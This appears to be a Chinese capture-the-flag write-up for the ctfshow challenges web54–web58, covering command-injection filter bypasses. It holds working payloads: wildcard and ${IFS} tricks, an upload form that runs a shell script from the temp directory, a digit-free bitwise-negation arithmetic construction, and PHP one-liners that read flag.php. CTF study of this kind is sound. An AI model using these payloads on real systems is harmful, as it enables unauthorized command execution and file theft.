1.web54
比如说cat,.*当出现cat这个整体时才会进行匹配,会尽可能匹配较多字符,ca,c之类的字符不会进行匹配,tac为什么不能用t??,是因为还有一个跟它一样长度的命令top
payload:
c=/bin/c??${IFS}????????
c=/bin/c??$IFS????????
2.web55
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>POST数据包POC</title>
</head>
<body>
<form action="http://43546a81-d8c7-4242-a8ea-dde142ff1d80.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
访问并抓包,上传1.php
写入
#!/bin/sh
cat /var/www/html/flag.php
因为上传的文件在tmp目录下
3.web56
4.web57
~代表取反
所有正整数的按位取反是其本身+1的相反数
所有负整数的按位取反是其本身+1的绝对值
0的按位取反是 -1
所以只要构造-37即可
linux中(())是整数扩展,这种扩展计算是整数型的计算,当有$才会显示数值
或
$(())=0
(
(
((~
(( (())))=-1
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~
$(())))$((~$(())))$((~$(())))))))
5.web58
payload:
c=echo file_get_contents("flag.php");
c=readfile("flag.php");
c=var_dump(file('flag.php'));
c=highlight_file("flag.php");
c=show_source("flag.php");
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}#一行一行读取
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}#一行一个一个字符取
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
参考文章:
